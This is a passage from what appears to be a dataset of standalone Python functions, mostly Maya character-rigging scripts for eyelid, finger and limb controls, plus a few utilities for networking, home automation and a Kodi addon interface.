lf_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid - inner\n lf_lid01_dm01_adn = 
cmds.createNode('addDoubleLinear', n='lf_lid01_dm01_addDoubleLinear')\n cmds.connectAttr(lf_dn[1] + '.tx', lf_lid01_dm01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_dm01_adn + '.input2', 0.333)\n cmds.connectAttr(lf_lid01_dm01_adn + '.output', lf_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[1] + '.ty', lf_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputY', lf_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # mid - outer\n lf_lid01_dm02_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_dm02_addDoubleLinear')\n cmds.connectAttr(lf_dn[2] + '.tx', lf_lid01_dm02_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_dm02_adn + '.input2', 0.666)\n cmds.connectAttr(lf_lid01_dm02_adn + '.output', lf_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[2] + '.ty', lf_dn02_rvn + '.inputX', f=True)\n cmds.connectAttr(lf_dn02_rvn + '.outputX', lf_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)\n # outer\n lf_lid01_do01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_do01_addDoubleLinear')\n cmds.connectAttr(lf_dn[3] + '.tx', lf_lid01_do01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_do01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_do01_adn + '.output', lf_lidrails + '.offsetbottom[3].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[3] + '.ty', lf_dn02_rvn + '.inputY')\n cmds.connectAttr(lf_dn02_rvn + '.outputY', lf_lidrails + '.offsetbottom[3].offsetbottom_FloatValue', f=True)\n\n # rt_up =========\n\n # inner\n rt_lid01_ui01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_ui01_plusMinusAverage')\n cmds.setAttr(rt_lid01_ui01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_up[0] + '.tx', rt_lid01_ui01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_ui01_asn + '.output1D', rt_lidrails + '.offsettop[3].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[0] + '.ty', rt_lidrails + '.offsettop[3].offsettop_FloatValue', f=True)\n # mid -inner\n rt_lid01_um01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_um01_multDoubleLinear')\n rt_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='rt_lid01_um01_addDoubleLinear')\n cmds.connectAttr(rt_up[2] + '.tx', rt_lid01_um01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_um01_mdn + '.output', rt_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_adn + '.input2', 0.333)\n cmds.connectAttr(rt_lid01_um01_adn + '.output', rt_lidrails + '.offsettop[2].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[2] + '.ty', rt_lidrails + '.offsettop[2].offsettop_FloatValue', f=True)\n\n # mid - outer\n rt_lid01_um02_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_um02_multDoubleLinear')\n rt_lid01_um02_adn = cmds.createNode('addDoubleLinear', n='rt_lid01_um02_addDoubleLinear')\n cmds.connectAttr(rt_up[1] + '.tx', rt_lid01_um02_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um02_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_um02_mdn + '.output', rt_lid01_um02_adn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um02_adn + '.input2', 0.666)\n cmds.connectAttr(rt_lid01_um02_adn + '.output', rt_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[1] + '.ty', rt_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n\n # outer\n rt_lid01_uo_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_uo_multDoubleLinear')\n cmds.connectAttr(rt_up[3] + '.tx', rt_lid01_uo_mdn + '.input1', f=True)\n 
cmds.setAttr(rt_lid01_uo_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_uo_mdn + '.output', rt_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[3] + '.ty', rt_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n\n # rt_dn =========\n\n rt_dn_rvn = cmds.createNode('reverse', n='rt_lid01_dn01_reverse')\n rt_dn02_rvn = cmds.createNode('reverse', n='rt_lid01_dn02_reverse')\n # inner\n rt_lid01_di01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_di01_plusMinusAverage')\n cmds.setAttr(rt_lid01_di01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_di01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_dn[0] + '.tx', rt_lid01_di01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_di01_asn + '.output1D', rt_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[0] + '.ty', rt_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputX', rt_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid - inner\n rt_lid01_dm01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_dm01_plusMinusAverage')\n cmds.setAttr(rt_lid01_dm01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_dm01_asn + '.input1D[0]', 0.333)\n cmds.connectAttr(rt_dn[2] + '.tx', rt_lid01_dm01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_dm01_asn + '.output1D', rt_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[2] + '.ty', rt_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputY', rt_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # mid - outer\n rt_lid01_dm02_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_dm02_plusMinusAverage')\n cmds.setAttr(rt_lid01_dm02_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_dm02_asn + '.input1D[0]', 0.666)\n cmds.connectAttr(rt_dn[1] + '.tx', rt_lid01_dm02_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_dm02_asn + '.output1D', rt_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[1] + '.ty', rt_dn02_rvn + '.inputX', f=True)\n cmds.connectAttr(rt_dn02_rvn + '.outputX', rt_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)\n # outer\n rt_lid01_do01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_do01_multDoubleLinear')\n cmds.connectAttr(rt_dn[3] + '.tx', rt_lid01_do01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_do01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_do01_mdn + '.output', rt_lidrails + '.offsetbottom[3].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[3] + '.ty', rt_dn02_rvn + '.inputY', f=True)\n cmds.connectAttr(rt_dn02_rvn + '.outputY', rt_lidrails + '.offsetbottom[3].offsetbottom_FloatValue')", "def bdev_nvme_enable_controller(client, name, cntlid):\n\n params = {'name': name}\n\n if cntlid is not None:\n params['cntlid'] = cntlid\n\n return client.call('bdev_nvme_enable_controller', params)", "def _add_switch(self, label, id, orientation=0, return_switch=True):\n switch = ArduinoSwitchControlSwitch(label, id,\n orientation=orientation)\n self.switch_ids[id] = switch\n self.switches[label] = switch\n\n if return_switch:\n return switch", "def __init__(self, contr: widgets.base_controller,\n parent: widgets.base_widget,\n idstr: str,\n attrdct: dict,\n jsel,\n titletext: str,\n helptext: str) -> None:\n super().__init__(contr, parent, idstr, attrdct, jsel)\n self.wcstatus: wcstatus.WCstatus = contr.wcstatus\n self.addClass(\"w3-container\")\n self.addClass('switchview-cls')\n self.setAttribute('height', '80%')\n 
self.setAttribute('width', '100%')\n self.h1 = html.h1text(self, titletext)\n help_attrdct = {'class': 'w3-container'}\n self.helptext = html.spanhelptext(self, \"addhelptext\", help_attrdct, helptext)", "def connectCns(cnxDict, nsRig=None, nsSkin=None):\n for i, jnt in enumerate(cnxDict[\"joints\"]):\n if nsSkin:\n oJnt = pm.PyNode(nsSkin + \":\" + jnt)\n else:\n oJnt = pm.PyNode(jnt)\n\n if cnxDict[\"attrs\"][i][0]:\n if nsRig:\n oAttr = pm.PyNode(nsRig + \":\" + cnxDict[\"attrs\"][i][0])\n else:\n oAttr = pm.PyNode(cnxDict[\"attrs\"][i][0])\n\n oNode = oAttr.node()\n oTrans = pm.listConnections(\n pm.listConnections(oNode.inputMatrix)[0].matrixIn[0])\n pm.parentConstraint(oTrans, oJnt, mo=True)\n pm.scaleConstraint(oTrans, oJnt, mo=True)", "def add_a_keyable_attribute(myObj, oDataType, oParamName, oMin=None, oMax=None, oDefault=0.0):\r\n oFullName = '.'.join( [str(myObj),oParamName] )\r\n if pm.objExists(oFullName):\r\n return pm.PyNode(oFullName)\r\n else:\r\n myObj.addAttr(oParamName, at=oDataType, keyable=True, dv=oDefault)\r\n myAttr = pm.PyNode(myObj + '.' + oParamName)\r\n if oMin != None:\r\n myAttr.setMin(oMin)\r\n if oMax != None:\r\n myAttr.setMax(oMax)\r\n pm.setAttr(myAttr, e=True, channelBox=True)\r\n pm.setAttr(myAttr, e=True, keyable=True)\r\n return myAttr", "def label_joints():\n side_dict = {'C': 0,\n 'L': 1,\n 'R': 2}\n for jnt in mc.ls(type='joint'):\n mc.setAttr('{}.side'.format(jnt), side_dict[jnt.split('_')[0]])\n mc.setAttr('{}.type'.format(jnt), 18)\n mc.setAttr('{}.otherType'.format(jnt), jnt.split('_')[1], type=\"string\")", "def inchi_to_inchi_key(ich):\n ick = _rd_chem.inchi.InchiToInchiKey(ich)\n return ick", "def LabelDisks(self):\n pass", "def setup_threeCtrl(lf_lidrails, rt_lidrails):\n # Declare control variables\n lf_up = ['lf_lid01_tp01_ccc', 'lf_lid01_tp02_ccc', 'lf_lid01_tp03_ccc']\n lf_dn = ['lf_lid01_dn01_ccc', 'lf_lid01_dn02_ccc', 'lf_lid01_dn03_ccc']\n rt_up = ['rt_lid01_tp01_ccc', 'rt_lid01_tp02_ccc', 'rt_lid01_tp03_ccc']\n rt_dn = ['rt_lid01_dn01_ccc', 'rt_lid01_dn02_ccc', 'rt_lid01_dn03_ccc']\n\n # Connect lidRails ramps to lid profile controls\n\n # ========\n # lf_up\n\n # inner\n cmds.connectAttr(lf_up[0] + '.tx', lf_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[0] + '.ty', lf_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n # mid\n lf_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_um01_addDoubleLinear')\n cmds.connectAttr(lf_up[1] + '.tx', lf_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_um01_adn + '.input2', 0.5)\n cmds.connectAttr(lf_lid01_um01_adn + '.output', lf_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[1] + '.ty', lf_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n # outer\n lf_lid01_uo01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_uo01_addDoubleLinear')\n cmds.connectAttr(lf_up[2] + '.tx', lf_lid01_uo01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_uo01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_uo01_adn + '.output', lf_lidrails + '.offsettop[2].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[2] + '.ty', lf_lidrails + '.offsettop[2].offsettop_FloatValue', f=True)\n\n # ========\n # lf_dn\n\n # Reverse node\n lf_dn_rvn = cmds.createNode('reverse', n='lf_lid01_dn01_reverse')\n # inner\n cmds.connectAttr(lf_dn[0] + '.tx', lf_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[0] + '.ty', lf_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(lf_dn_rvn + 
'.outputX', lf_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid\n lf_lid01_dm01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_dm01_addDoubleLinear')\n cmds.connectAttr(lf_dn[1] + '.tx', lf_lid01_dm01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_dm01_adn + '.input2', 0.5)\n cmds.connectAttr(lf_lid01_dm01_adn + '.output', lf_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[1] + '.ty', lf_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputY', lf_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # outer\n lf_lid01_do01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_do01_addDoubleLinear')\n cmds.connectAttr(lf_dn[2] + '.tx', lf_lid01_do01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_do01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_do01_adn + '.output', lf_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[2] + '.ty', lf_dn_rvn + '.inputZ', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputZ', lf_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)\n\n # ========\n # rt_up\n\n # inner\n rt_lid01_ui01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_ui01_plusMinusAverage')\n cmds.setAttr(rt_lid01_ui01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_ui01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_up[0] + '.tx', rt_lid01_ui01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_ui01_asn + '.output1D', rt_lidrails + '.offsettop[2].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[0] + '.ty', rt_lidrails + '.offsettop[2].offsettop_FloatValue', f=True)\n # mid\n rt_lid01_um01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_um01_multDoubleLinear')\n rt_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='rt_lid01_um01_addDoubleLinear')\n cmds.connectAttr(rt_up[1] + '.tx', rt_lid01_um01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_um01_mdn + '.output', rt_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_adn + '.input2', 0.5)\n cmds.connectAttr(rt_lid01_um01_adn + '.output', rt_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[1] + '.ty', rt_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n # outer\n rt_lid01_uo_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_uo_multDoubleLinear')\n cmds.connectAttr(rt_up[2] + '.tx', rt_lid01_uo_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_uo_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_uo_mdn + '.output', rt_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[2] + '.ty', rt_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n\n # ========\n # rt_dn\n\n # Reverse node\n rt_dn_rvn = cmds.createNode('reverse', n='rt_lid01_dn01_reverse')\n # inner\n rt_lid01_di01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_di01_plusMinusAverage')\n cmds.setAttr(rt_lid01_di01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_di01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_dn[0] + '.tx', rt_lid01_di01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_di01_asn + '.output1D', rt_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[0] + '.ty', rt_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputX', rt_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid\n rt_lid01_dm01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_dm01_plusMinusAverage')\n 
cmds.setAttr(rt_lid01_dm01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_dm01_asn + '.input1D[0]', 0.5)\n cmds.connectAttr(rt_dn[1] + '.tx', rt_lid01_dm01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_dm01_asn + '.output1D', rt_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[1] + '.ty', rt_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputY', rt_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # outer\n rt_lid01_do01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_do01_multDoubleLinear')\n cmds.connectAttr(rt_dn[2] + '.tx', rt_lid01_do01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_do01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_do01_mdn + '.output', rt_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[2] + '.ty', rt_dn_rvn + '.inputZ', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputZ', rt_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)", "def attrControlGrp(*args, annotation: Union[AnyStr, bool]=\"\", attribute: Union[name, bool]=None,\n changeCommand: Union[Script, bool]=None, enable: bool=True, exists:\n bool=True, handlesAttribute: Union[name, bool]=None, hideMapButton:\n bool=True, label: Union[AnyStr, bool]=\"\", preventOverride: bool=True, q=True,\n query=True, e=True, edit=True, **kwargs)->Union[AnyStr, Any]:\n pass", "def init_kern_act(num_pitches):\n\n kern_act = []\n\n for i in range(num_pitches):\n kern_act.append(Matern32(1, lengthscales=1.0, variance=3.5))\n return kern_act", "def build(\n baseRigData,\n handJnt,\n topFingJnts,\n prefix = 'new',\n ctrlScale = 1.0,\n doConstraintRot = False,\n enableFingerTranslate = True,\n withEndJoints = False\n ):\n \n # names\n side = name.getSide( prefix )\n \n #===========================================================================\n # module\n #===========================================================================\n \n rigmodule = module.Module( prefix )\n rigmodule.connect( baseRigData = baseRigData )\n rigmodule.parent( baseRigData = baseRigData )\n \n # make return directory\n \n fingerCtrls = [ None ] * 5\n \n for i, topJnt in enumerate( topFingJnts ):\n \n chainFingerJnts = joint.listHierarchy( topJnt, withEndJoints = withEndJoints )\n \n prefix = name.getBase( topJnt )\n \n fingerRigData = general.makeFkControlChain( chain = chainFingerJnts, \n prefix = prefix, \n scale = ctrlScale, \n connectR = True, \n connectT = enableFingerTranslate, \n useConstraints = doConstraintRot, \n constraintFirst = False, \n ctrlshape = 'circle', \n ctrlColorName = 'secondary', \n ctrlParent = rigmodule.Controls )\n \n\n\n mc.parentConstraint( handJnt, fingerRigData[0].Off, mo = True)\n\n fingerCtrls[i] = fingerRigData \n \n \n\n return {\n 'thumbControls': fingerCtrls[0],\n 'indexControls': fingerCtrls[1],\n 'middleControls': fingerCtrls[2],\n 'ringControls': fingerCtrls[3],\n 'pinkyControls': fingerCtrls[4],\n 'module':rigmodule\n }", "def create_netmiko_connection(self, opt):\n\n key = opt['ip']\n conn_list = ['None', 'None', 'None']\n net_connect_dict = self._netmiko_connection\n auth = (opt['username'], opt['password'])\n if key not in net_connect_dict:\n # case 1: No key create a connection\n try:\n net_connect = self._establish_netmiko_handler(opt, net_connect_dict)\n if net_connect:\n hashed_auth = self._hash_auth_string(auth)\n conn_list[0] = net_connect\n conn_list[1] = hashed_auth\n conn_list[2] = threading.Lock()\n net_connect_dict[key] = conn_list\n except ValueError as err:\n 
raise\n except Exception as err:\n raise\n\n else:\n existing_hash = net_connect_dict[key][1]\n conn_list = self._get_netmiko_connection(key)\n conn_obj = conn_list[0]\n if self._check_auth_string(existing_hash, auth):\n # case 2: check if connection object is alive\n if conn_obj.is_alive() is True:\n conn_obj.set_base_prompt()\n return\n # case 3: Assume user value is new so delete existing\n # and add new connection object for this\n else:\n #disconnect stale object\n conn_list[2].acquire()\n conn_obj.disconnect()\n conn_list[2].release()\n\n # Existing object is not valid so clear and create new\n # connection\n del net_connect_dict[key]\n try:\n net_connect = self._establish_netmiko_handler(opt, net_connect_dict)\n if net_connect:\n new_hash = self._hash_auth_string(auth)\n conn_list[0] = net_connect\n conn_list[1] = new_hash\n conn_list[2] = threading.Lock()\n net_connect_dict[key] = conn_list\n except ValueError as error:\n raise\n except Exception:\n raise Exception", "def __init__(\n self,\n data: ProtectData,\n device: ProtectAdoptableDeviceModel,\n description: ProtectSwitchEntityDescription,\n ) -> None:\n super().__init__(data, device, description)\n self._attr_name = f\"{self.device.display_name} {self.entity_description.name}\"\n self._switch_type = self.entity_description.key", "def create_fk_chain(controls, joints):\n\n # create control offset transforms\n constraints = []\n exp_tf_ms = []\n\n for ctl in controls:\n par = cmds.listRelatives(ctl, parent=True)\n buf = create_offset_transform(ctl, BUF)\n exp = create_offset_transform(ctl, EXP)\n off = create_offset_transform(ctl, OFF)\n\n cmds.parent(ctl, off)\n cmds.parent(off, exp)\n cmds.parent(exp, buf)\n if par: cmds.parent(buf, par[0])\n\n exp_tf_ms.append(buf)\n\n for src, trg in zip(controls, joints):\n # constrain fk joints to controls, hide the constraint nodes\n pc = cmds.parentConstraint(src, trg, mo=True)[0]\n cmds.setAttr('{node}.interpType'.format(node=pc), 2)\n cmds.setAttr('{node}.visibility'.format(node=pc), False)\n sc = cmds.scaleConstraint(src, trg)[0]\n cmds.setAttr('{node}.visibility'.format(node=sc), False)\n constraints.extend([pc, sc])\n\n return constraints, exp_tf_ms", "def knn_manage(k):\n\n xtrain, xtest, label_train, label_test = get_data()\n pred = knn_classify(xtrain, xtest, label_train, k)\n conf_mat, accuracy, misclassified = confusion_matrix_accuracy(pred, label_test)\n print accuracy\n print conf_mat", "def _aim_ctrl(self):\n y = 0\n z = 0\n\n if self.aim_axis == \"y\":\n z = 90\n elif self.aim_axis == \"z\":\n y = -90\n\n for shape in self.ctrl.getShapes():\n pm.rotate(shape.cv, 0, y, z, r=1)", "def multi_joint_stretch(ik_ctrl, ik_last_node, switch_ctrl, fk_ctrls, jnts, ik_handle):\n\n root_grp = utils.get_parent(jnts[0])\n stretch_jnts = jnts[1:]\n stretch_fk_ctrls = fk_ctrls[1:]\n\n # create attrs\n attrs = ['upStretch','loStretch']\n for i in reversed(range(len(stretch_jnts)-2)):\n ltr = ''\n if i > 0:\n ltr = utils.letters[i]\n\n attrs.insert(1, 'midStretch'+ltr)\n\n if not mc.objExists(ik_ctrl+'.autoStretch'):\n mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1)\n\n for i in range(len(stretch_jnts)):\n if not mc.objExists(ik_ctrl+'.'+attrs[i]):\n mc.addAttr(ik_ctrl, ln=attrs[i], at='double', dv=1, min=0.001, k=1)\n\n for fk_ctrl in fk_ctrls[:-1]:\n if not mc.objExists(fk_ctrl+'.stretch'):\n mc.addAttr(fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n\n # store initial length of joint\n init_lengths = [mc.getAttr(j+'.tx') for j in stretch_jnts]\n 
abs_init_lengths = [abs(v) for v in init_lengths]\n\n total_init_length = 0\n for v in init_lengths:\n total_init_length += v\n\n abs_total_init_length = abs(total_init_length)\n\n # Create dist reader\n root_to_end_dist = utils.create_distance_reader(root_grp, ik_last_node)\n\n auto_stretch_clamp = mc.createNode('clamp')\n mc.setAttr(auto_stretch_clamp+'.minR', 1)\n mc.setAttr(auto_stretch_clamp+'.maxR', 10000000)\n mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR')\n\n mc.addAttr(ik_ctrl, ln='stretchFactor', k=0)\n mc.connectAttr(auto_stretch_clamp+'.inputR', ik_ctrl+'.stretchFactor')\n\n pma = mc.createNode('plusMinusAverage')\n utils.connect_abs(pma+'.output1D', root_to_end_dist+'.jointChainLength')\n\n # handle soft ik handle constraint override\n pc = mc.pointConstraint(ik_last_node, ik_handle)[0]\n if mc.objExists(jnts[0]+'.softIkChainLength'):\n\n # compensate chain length - feed in new chain length for soft ik chain length\n utils.connect_abs(pma+'.output1D', jnts[0]+'.softIkChainLength')\n\n # blend off the soft ik constraint IF im in auto stretch\n mc.connectAttr(ik_ctrl+'.autoStretch', pc+'.w1')\n utils.connect_reverse(pc+'.w1', pc+'.w0')\n\n # easy stuff first - create fk stretch nodes\n fk_to_ik_blends = [] # This is the final output for IK stretch\n\n for i, jnt in enumerate(stretch_jnts):\n\n # easy stuff first - create fk stretch nodes\n fk_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr(fk_mdl+'.input1', mc.getAttr(jnt+'.tx'))\n mc.connectAttr(fk_ctrls[i]+'.stretch', fk_mdl+'.input2')\n utils.connect_abs(fk_mdl+'.output', fk_ctrls[i+1]+'_ZERO.tx')\n\n # Create user secifed IK stretch\n user_ik_scale_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr( user_ik_scale_mdl+'.input1', init_lengths[i])\n mc.connectAttr(ik_ctrl+'.'+attrs[i], user_ik_scale_mdl+'.input2')\n\n # Now create the IK auto stretch nodes\n auto_stretch_mdl = mc.createNode('multDoubleLinear')\n mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(auto_stretch_clamp+'.outputR', auto_stretch_mdl+'.input2', f=1)\n mc.connectAttr(user_ik_scale_mdl+'.output', '{0}.input1D[{1}]'.format(pma, i))\n\n fk_to_ik_blend = mc.createNode('blendTwoAttr')\n auto_stretch_blend = mc.createNode('blendTwoAttr')\n\n mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.attributesBlender')\n mc.connectAttr(fk_mdl+'.output', fk_to_ik_blend+'.input[0]')\n mc.connectAttr(auto_stretch_blend+'.output', fk_to_ik_blend+'.input[1]')\n\n mc.connectAttr(ik_ctrl+'.autoStretch', auto_stretch_blend+'.attributesBlender')\n mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_blend+'.input[0]')\n mc.connectAttr(auto_stretch_mdl+'.output', auto_stretch_blend+'.input[1]')\n\n fk_to_ik_blends.append(fk_to_ik_blend+'.output')\n\n for i, jnt in enumerate(stretch_jnts):\n mc.connectAttr(fk_to_ik_blends[i], jnt+'.tx')", "def handle_create_ai_view(self, dobject_id, dclass, fields):\n logger.debug(\"AIRepository {} has been made the controlling AI \"\n \"for dobject \\\"{}\\\"\".format(self.channel, dobject_id))\n # TODO: Well, create that AI view!\n pass", "def set_controls(self):\n # Image control\n image = pyxbmct.Image(addonfolder+artsfolder+'/k.png')\n self.placeControl(image, 0, 0, rowspan=8, columnspan=16)\n\n\t\t# KI Plus\n self.k1plus_button = pyxbmct.RadioButton('')\n self.placeControl(self.k1plus_button, 8, 1, rowspan=2, columnspan=4)\n self.connect(self.k1plus_button, self.k1plus_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'k1plus', 2) == 1:\n 
self.k1plus_button.setSelected(True)\n else:\n self.k1plus_button.setSelected(False)\n k1plus = pyxbmct.Image(addonfolder+artsfolder+'/k1plus.png')\n self.placeControl(k1plus, 8, 1, rowspan=2, columnspan=4)\n\n\t\t# KI Pro\n self.k1pro_button = pyxbmct.RadioButton('')\n self.placeControl(self.k1pro_button, 11, 6, rowspan=2, columnspan=4)\n self.connect(self.k1pro_button, self.k1pro_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'k1pro', 2) == 1:\n self.k1pro_button.setSelected(True)\n else:\n self.k1pro_button.setSelected(False)\n k1pro = pyxbmct.Image(addonfolder+artsfolder+'/k1pro.png')\n self.placeControl(k1pro, 11, 6, rowspan=2, columnspan=4)\n\n\t\t# KII Pro\n self.k2pro_button = pyxbmct.RadioButton('')\n self.placeControl(self.k2pro_button, 8, 6, rowspan=2, columnspan=4)\n self.connect(self.k2pro_button, self.k2pro_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'k2pro', 2) == 1:\n self.k2pro_button.setSelected(True)\n else:\n self.k2pro_button.setSelected(False)\n k2pro = pyxbmct.Image(addonfolder+artsfolder+'/k2pro.png')\n self.placeControl(k2pro, 8, 6, rowspan=2, columnspan=4)\n\n\t\t# KIII Pro\n self.k3pro_button = pyxbmct.RadioButton('')\n self.placeControl(self.k3pro_button, 8, 11, rowspan=2, columnspan=4)\n self.connect(self.k3pro_button, self.k3pro_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'k3pro', 2) == 1:\n self.k3pro_button.setSelected(True)\n else:\n self.k3pro_button.setSelected(False)\n k3pro = pyxbmct.Image(addonfolder+artsfolder+'/k3pro.png')\n self.placeControl(k3pro, 8, 11, rowspan=2, columnspan=4)\n\n\t\t# Close button\n self.close_button = pyxbmct.Button('Exit')\n self.placeControl(self.close_button, 13, 15, rowspan=1, columnspan=1)\n self.connect(self.close_button, lambda: self.closepage())", "def lnhattr(shape):\n\n arnold_nodes = ('rcurve', 'cwdth', 'srate', 'ai_curve_shaderr', 